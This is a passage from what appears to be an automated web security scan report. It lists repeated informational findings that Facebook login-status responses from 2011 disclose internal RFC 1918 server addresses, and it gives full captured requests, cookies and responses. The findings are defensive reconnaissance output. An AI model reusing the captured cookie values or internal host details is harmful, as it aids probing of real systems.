%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df11772bc08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff18f5c7244%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a444fa68&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2874d7494&origin=http%3A%2F%2Faol.sportingnews.com%2Ff18f5c7244&relation=parent&transport=postmessage&frame=f3a444fa68
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.123.103
X-Cnection: close
Date: Thu, 05 May 2011 01:16:48 GMT
Content-Length: 0

20.58. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.204.49

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df257e02bac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a62c078%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24f18b208%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9850195%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc642f8f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff827019bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df128e5845c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f9850195&origin=http%3A%2F%2Faol.sportingnews.com%2Ff827019bc&relation=parent&transport=postmessage&frame=f128e5845c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.204.49
X-Cnection: close
Date: Thu, 05 May 2011 01:36:12 GMT
Content-Length: 0

20.59. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.66.35

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df14ae60cbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d9be3614%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ba76c9f4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df789dd148%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df231940b58%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff21d1efae%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3187a3d4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f789dd148&origin=http%3A%2F%2Faol.sportingnews.com%2Ff21d1efae&relation=parent&transport=postmessage&frame=f3187a3d4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.66.35
X-Cnection: close
Date: Thu, 05 May 2011 01:52:54 GMT
Content-Length: 0

20.60. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.57.69

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df308eabbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df6a416888%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3842c056%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32608145c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df115113c5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3f72ef73c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df21ae57fb&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32608145c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3f72ef73c&relation=parent&transport=postmessage&frame=f21ae57fb
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.57.69
X-Cnection: close
Date: Thu, 05 May 2011 01:01:26 GMT
Content-Length: 0

20.61. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.53.21.45

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1339cc754%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e588f108%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1ee1c9d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f13e5a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2c304d4ac%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff6b0a6094%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df7e80b42&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2f13e5a08&origin=http%3A%2F%2Faol.sportingnews.com%2Ff6b0a6094&relation=parent&transport=postmessage&frame=f7e80b42
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.53.21.45
X-Cnection: close
Date: Thu, 05 May 2011 01:46:08 GMT
Content-Length: 0

20.62. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.55.121

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3b9d3984%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df328e7f2d8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df96c8bf4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2587c00cc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df5fe916a%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2ae3f690%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfced2d8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2587c00cc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2ae3f690&relation=parent&transport=postmessage&frame=fced2d8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.55.121
X-Cnection: close
Date: Thu, 05 May 2011 02:08:08 GMT
Content-Length: 0

20.63. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.196.58

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df170bd0aa8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df356616aec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74e3345c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3ff7cfac4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cbc8450%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff3b3e8335c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3a74e3d8c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3ff7cfac4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff3b3e8335c&relation=parent&transport=postmessage&frame=f3a74e3d8c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.196.58
X-Cnection: close
Date: Thu, 05 May 2011 01:55:40 GMT
Content-Length: 0

20.64. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.170.63

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fabf25c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2ac5a7018%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df26eeb8de4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2cd7fd808%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1673c10b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff37853b0a%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df171530904&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2cd7fd808&origin=http%3A%2F%2Faol.sportingnews.com%2Ff37853b0a&relation=parent&transport=postmessage&frame=f171530904
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.170.63
X-Cnection: close
Date: Thu, 05 May 2011 01:28:00 GMT
Content-Length: 0

20.65. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.131.112

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e0100b74%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3c42d3d3c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfe2f33c38%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df72799f14%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f33cb98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff2b1247504%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa6b0fa98&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f72799f14&origin=http%3A%2F%2Faol.sportingnews.com%2Ff2b1247504&relation=parent&transport=postmessage&frame=fa6b0fa98
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.131.112
X-Cnection: close
Date: Thu, 05 May 2011 01:06:55 GMT
Content-Length: 0

20.66. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.184.77

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df10089c9e8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20c937f5c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2426545d%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2f94026b8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df181840e9%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff108e0ea74%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2a59c0a7&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
